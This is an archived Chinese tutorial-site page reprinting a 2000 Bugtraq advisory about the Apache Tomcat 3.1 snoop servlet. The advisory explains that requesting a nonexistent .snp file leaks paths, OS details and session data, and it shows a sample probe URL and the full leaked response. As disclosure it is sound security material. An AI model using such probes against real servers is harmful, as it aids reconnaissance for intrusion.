?? 0155.htm
字號:
<html>
<head>
<title>新時代軟件教程:操作系統 主頁制作 服務器 設計軟件 網絡技術 編程語言 文字編輯</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style>
<!--
body, table {font-size: 9pt; font-family: 宋體}
a {text-decoration:none}
a:hover {color: red;text-decoration:underline}
.1 {background-color: rgb(245,245,245)}
-->
</head>
<p align="center"><script src="../../1.js"></script></a>
<p align="center"><big><strong>Apache Tomcat Snoop Servlet重要信息暴露漏洞</strong></big></p>
<div align="right">---摘自互聯網</div>
<br>bugtraq id 1532 <br>
class Design Error <br>
cve GENERIC-MAP-NOMATCH <br>
remote Yes <br>
local No <br>
published July 20, 2000 <br>
updated August 02, 2000 <br>
vulnerable Apache Group Tomcat 3.1<br>
- Sun Solaris 8.0<br>
- Sun Solaris 7.0<br>
- SGI IRIX 6.5<br>
- SGI IRIX 6.4<br>
- RedHat Linux 6.2 i386<br>
- RedHat Linux 6.1 i386<br>
- NetBSD NetBSD 1.4.2 x86<br>
- NetBSD NetBSD 1.4.1 x86<br>
- MandrakeSoft Linux Mandrake 7.1<br>
- MandrakeSoft Linux Mandrake 7.0<br>
- FreeBSD FreeBSD 5.0<br>
- FreeBSD FreeBSD 4.0<br>
- Digital UNIX 4.0<br>
- Debian Linux 2.2<br>
- Debian Linux 2.1<br>
- Connectiva Linux 5.1<br>
- Caldera OpenLinux 2.4<br>
- BSDI BSD/OS 4.0<br>
Apache Group Tomcat 3.0<br>
<br>
A vulnerability exists in the snoop servlet portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent file with the .snp extension, too much information is presented by the server as part of the error message. This information may be useful to a would be attacker in conducting further attacks. This information includes full paths, OS information, and other information that may be sensitive.<br>
<br>
http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp<br>
====<br>
Snoop Servlet<br>
<br>
Servlet init parameters:<br>
<br>
Context init parameters:<br>
<br>
Context attributes:<br>
javax.servlet.context.tempdir =<br>
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples<br>
sun.servlet.workdir =<br>
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples<br>
<br>
Request attributes:<br>
<br>
Servlet Name: snoop<br>
Protocol: HTTP/1.0<br>
Scheme: http<br>
Server Name: narco.goverment.sucks.co<br>
Server Port: 8080 <br>
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX<br>
4.2 POWER_RS; java.vendor=IBM Corporation)<br>
Remote Addr: xxx.xxx.xxx.xxx<br>
Remote Host: xxx.xxx.xxx.xxx<br>
Character Encoding: null<br>
Content Length: -1<br>
Content Type: null<br>
Locale: en<br>
Default Response Buffer: 8192<br>
<br>
Parameter names in this request:<br>
<br>
Headers in this request:<br>
Host: narco.goverment.sucks.co:8080<br>
Accept-Encoding: gzip<br>
Cookie: JSESSIONID=To1212mC7833304641226407At<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,<br>
*/*<br>
Connection: Keep-Alive<br>
Accept-Charset: iso-8859-1,*,utf-8<br>
User-Agent: Mozilla/4.51 [en] (Winsucks; I)<br>
Accept-Language: en<br>
<br>
Cookies in this request:<br>
JSESSIONID = To1212mC7833304641226407At<br>
<br>
Request Is Secure: false<br>
Auth Type: null<br>
HTTP Method: GET<br>
Remote User: null<br>
Request URI: /examples/jsp/snp/anything.snp<br>
Context Path: /examples<br>
Servlet Path: /jsp/snp/anything.snp<br>
Path Info: null<br>
Path Trans: null<br>
Query String: null<br>
<br>
Requested Session Id: To1212mC7833304641226407At<br>
Current Session Id: To1212mC7833304641226407At<br>
Session Created Time: 964047263477<br>
Session Last Accessed Time: 964047528749<br>
Session Max Inactive Interval Seconds: 1800<br>
<br>
Session values: <br>
numguess = num.NumberGuessBean@6bfa9a1
</table>
<p align="center"><script src="../../2.js"></script></a>
</body>
</html>
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -